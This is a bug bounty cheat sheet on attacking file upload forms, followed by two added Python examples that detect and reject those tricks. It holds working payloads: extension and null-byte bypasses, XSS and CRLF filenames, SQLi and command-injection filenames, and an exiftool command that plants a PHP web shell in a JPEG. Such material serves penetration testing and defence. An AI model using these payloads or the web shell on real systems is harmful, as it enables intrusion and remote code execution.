# File Upload

* [#BugBountyProTip Some caching servers would cache files larger than 2 MB. If the app accepts file upload, then upload a large file and access it multiple times while logged in. It will be cached. Then access it without login, and pingo! Unauthenticated access to sensitive files!](https://twitter.com/Zigoo0/status/1247175475316830208)
* [Uploader Vuln (#BugBounty):](https://twitter.com/YShahinzadeh/status/1063403827590762497)

  ```
  Content-Disposition: form-data; name="FactorImage"; filename="Untitled.jpg\test.aspx"
  Content-Type: image/jpeg
  Res:
  {"StoreHousePicture_File":"test.aspx","Success":true}
  ```
* <https://anotherhackerblog.com/exploiting-file-uploads-pt1/>
* <https://anotherhackerblog.com/exploiting-file-uploads-pt-2/>
* Payloads - <https://github.com/1N3/IntruderPayloads/tree/master/Uploads>
* [Bypassing most FILE Uploads filters for $$$$](https://twitter.com/pwntheweb/status/1258628238655598592) [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click):
  * `.htaccess` <- upload htaccess
  * `file.svg` <- uploading svg = xss
  * `file.SVg` <- must try case mismatch
  * `file.png.svg`
  * `file.php%00.png`
  * `file.png' or '1'='1`
  * `../../file.png`
  * `file.'svg` <- invalid ext.
* [Bypass File Upload Filtering in image](https://twitter.com/shreyasrx/status/1257501243171373066?s=20): `exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg` then `mv shell.jpg shell.php.jpg` [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click) [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click)
* [Time for another #BugBountyTip: While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if the ".asp" extension is blacklisted. This has already led me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming.](https://twitter.com/HusseiN98D/status/1194304002969743362)
* [#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so:](https://twitter.com/h4x0r_dz/status/1292452802338476037)
  * `<img src=x onerror=alert('XSS')>.png`
  * `"><img src=x onerror=alert('XSS')>.png`
  * `"><svg onmouseover=alert(1)>.svg`
  * `<<script>alert('xss')<!--a-->a.png`
* [#Bugbountytip Want to bypass a file extension restriction? Try HTTP Parameter Pollution on the filename parameter.](https://twitter.com/Hxzeroone/status/1250342399068352512?s=20)
* [Bypassing file content restrictions: in some cases you can do a CRLF injection via the filename `x.png%22%0d%0a%0d%0a%0d%0a<script>alert(1)</script>`; this will cause Content-Disposition to throw its content into the file. #bugbounty #xss #crlfinjection #bugbountytip](https://twitter.com/k33r0k/status/1047700322322399233?s=20)
* [If a web application allows you to upload a .zip file, zip:// is an interesting PHP wrapper to turn an LFI into an RCE. #BugBounty #BugBountyTips #InfoSec](https://twitter.com/infosecsanyam/status/1339481832451092480?s=20)
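Several tips above rely on the server trusting the extension or the client's Content-Type while the body is something else: PHP planted in a JPEG comment segment, an SVG carrying an event handler, or a zip archive handed to a PHP backend. The following is an added example written for this page (not code from any tweet quoted here) of the content-side checks a defender would run on an upload endpoint that accepts PNG, JPEG, GIF and SVG. It identifies the format from magic bytes, scans raster images for code markers, parses SVGs and rejects active content, and refuses archives outright. The sample bodies are constructed inline; the function names are this example's own.

```python
import re
import xml.etree.ElementTree as ET
from typing import Optional, Tuple

# Magic bytes of the raster formats the endpoint accepts. The extension and
# the client's Content-Type are both attacker-controlled, so neither is used.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Markers of server-side or client-side code that a raster image never needs.
# A PHP tag written into a JPEG comment segment (the exiftool -Comment trick)
# survives as plain bytes, so a byte scan finds it.
CODE_MARKERS = re.compile(rb"<\?php|<\?=|<%|<script", re.IGNORECASE)

# SVG elements that can execute or embed arbitrary content.
SVG_ACTIVE_TAGS = {"script", "foreignobject"}


def sniff_raster(data: bytes) -> Optional[str]:
    """Identify PNG/JPEG/GIF from the leading bytes, or None."""
    for kind, magic in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def svg_is_active(data: bytes) -> bool:
    """True if the SVG carries script, event handlers or javascript: links."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return True  # an unparsable "image" is rejected, not guessed at
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1].lower() in SVG_ACTIVE_TAGS:
            return True
        for attr, value in el.attrib.items():
            local = attr.rsplit("}", 1)[-1].lower()
            if local.startswith("on"):  # onload, onmouseover, ...
                return True
            if local == "href" and value.strip().lower().startswith("javascript:"):
                return True
    return False


def check_upload(data: bytes) -> Tuple[bool, str]:
    """Return (accepted, detected_kind_or_reason) for an uploaded image body."""
    if data.startswith(b"PK\x03\x04"):
        # Archives are never images; accepting one where images are expected
        # is what makes the zip:// wrapper trick possible on a PHP backend.
        return False, "zip archive"
    kind = sniff_raster(data)
    if kind is not None:
        if CODE_MARKERS.search(data):
            return False, f"{kind} containing code marker"
        return True, kind
    head = data.lstrip()
    if head.startswith(b"<?xml") or head.startswith(b"<svg"):
        if svg_is_active(head):
            return False, "svg with active content"
        return True, "svg"
    return False, "unrecognised format"


# Constructed sample bodies (not real uploads).
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 9 + b"\xff\xd9"
# JPEG with a COM segment (0xFFFE) carrying a PHP open tag, the shape that
# exiftool -Comment produces; the marker itself is inert.
COMMENT = b"<?php /* constructed marker */ ?>"
TAGGED_JPEG = b"\xff\xd8\xff\xfe" + (len(COMMENT) + 2).to_bytes(2, "big") + COMMENT + b"\xff\xd9"
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" width="8" height="8"><rect width="8" height="8"/></svg>'
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onmouseover="alert(1)"><rect width="8" height="8"/></svg>'
ZIP_BODY = b"PK\x03\x04" + b"\x00" * 26

if __name__ == "__main__":
    for label, body in [("clean jpeg", CLEAN_JPEG), ("tagged jpeg", TAGGED_JPEG),
                        ("clean svg", CLEAN_SVG), ("handler svg", HANDLER_SVG),
                        ("zip", ZIP_BODY)]:
        print(f"{label:12} -> {check_upload(body)}")
```

The byte scan is a detection aid, not the fix: the durable mitigation is that uploaded files are never handed to a server-side interpreter (stored outside the web root or on a separate origin with no script handlers), and SVG is either refused or served with a Content-Type and Content-Security-Policy that prevent it from running in the application's origin. Re-encoding raster images on the server strips comment and EXIF segments entirely, which removes the planted payload rather than merely detecting it.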

![](/files/-MTeC1rUild_UYMYAiWY)

[Chaining file uploads with other vulns:](https://twitter.com/ManasH4rsh/status/1315624930998775808?s=20) set the filename to one of:

```
../../../tmp/lol.png                         for path traversal
sleep(10)-- -.jpg                            for SQLi
<svg onload=alert(document.domain)>.jpg/png  for XSS
; sleep 10;                                  for command injection
```
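Every filename trick on this page, from the backslash in `Untitled.jpg\test.aspx` to the chained traversal, SQLi, XSS and command-injection payloads just listed, works only because some component reuses the client-supplied name. The following is an added example for this page (not code from any tweet quoted here) of how a defender handles that name: decode it once, refuse control characters and path separators, allow the extension only from an allowlist after lowercasing it, refuse stacked extensions, and then store the file under a server-generated name so the client's basename never reaches the filesystem, a query, a shell or a page. The allowlist, the function name and the `token` parameter are this example's own choices; the sample filenames are constructed from the tricks on this page.

```python
import re
import uuid
from typing import Optional, Tuple
from urllib.parse import unquote

# Extensions this endpoint is willing to store. Everything else, including
# .svg, .php, .asp, .aspx, .cer and .htaccess, is rejected by omission.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# ASCII control characters (NUL, CR, LF, ...) and both path separators.
CONTROL_OR_SEPARATOR = re.compile(r"[\x00-\x1f\x7f/\\]")


def classify_filename(raw: str, token: Optional[str] = None) -> Tuple[str, str]:
    """Decide what to do with a client-supplied upload filename.

    Returns ("ok", storage_name) or ("reject", reason). The storage name is
    built from a server-generated token plus the validated extension, so the
    client's basename is never written to disk, a query, a shell or a page.
    `token` is only overridable to make the result deterministic in tests.
    """
    # Decode percent-escapes once: "file.php%00.png" is meant to become a
    # NUL-truncated name somewhere downstream, so judge the decoded form.
    name = unquote(raw)

    if CONTROL_OR_SEPARATOR.search(name):
        return "reject", "control character or path separator in filename"

    if "." not in name:
        return "reject", "no file extension"

    base, ext = name.rsplit(".", 1)
    ext = ext.lower()  # case mismatch (file.SVg) must not slip past the allowlist
    if ext not in ALLOWED_EXTENSIONS:
        return "reject", f"extension not allowed: {ext!r}"

    # shell.php.jpg: servers with multi-extension handling (Apache mod_mime)
    # may still treat this as PHP, so refuse stacked extensions outright.
    if "." in base:
        return "reject", "multiple extensions"

    token = token or uuid.uuid4().hex
    return "ok", f"{token}.{ext}"


# Constructed sample filenames, taken from the tricks listed on this page.
SAMPLES = [
    "photo.JPG",
    "../../../tmp/lol.png",
    "Untitled.jpg\\test.aspx",
    "file.php%00.png",
    "file.SVg",
    "shell.php.jpg",
    ".htaccess",
    "file.cer",
    "x.png%22%0d%0a%0d%0a%0d%0a<script>alert(1)</script>",
    "<img src=x onerror=alert('XSS')>.png",
    "sleep(10)-- -.jpg",
    "; sleep 10;",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict, detail = classify_filename(sample, token="stored")
        print(f"{verdict:6} {sample!r:60} -> {detail}")
```

Note that a basename such as `<img src=x onerror=alert('XSS')>` or `sleep(10)-- -` is accepted: it carries a permitted extension and nothing else about it is ever used, which is the point. If the original name must be shown back to a user or kept in a database, escape it at output and bind it as a query parameter; the reject reasons are what to log and alert on, since a NUL, CRLF or traversal sequence in a multipart filename is a strong signal of probing.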

Want to bypass a file extension restriction? Try HTTP Parameter Pollution on the filename parameter.

![](/files/-MWEFgEN14t2enelKC7W)

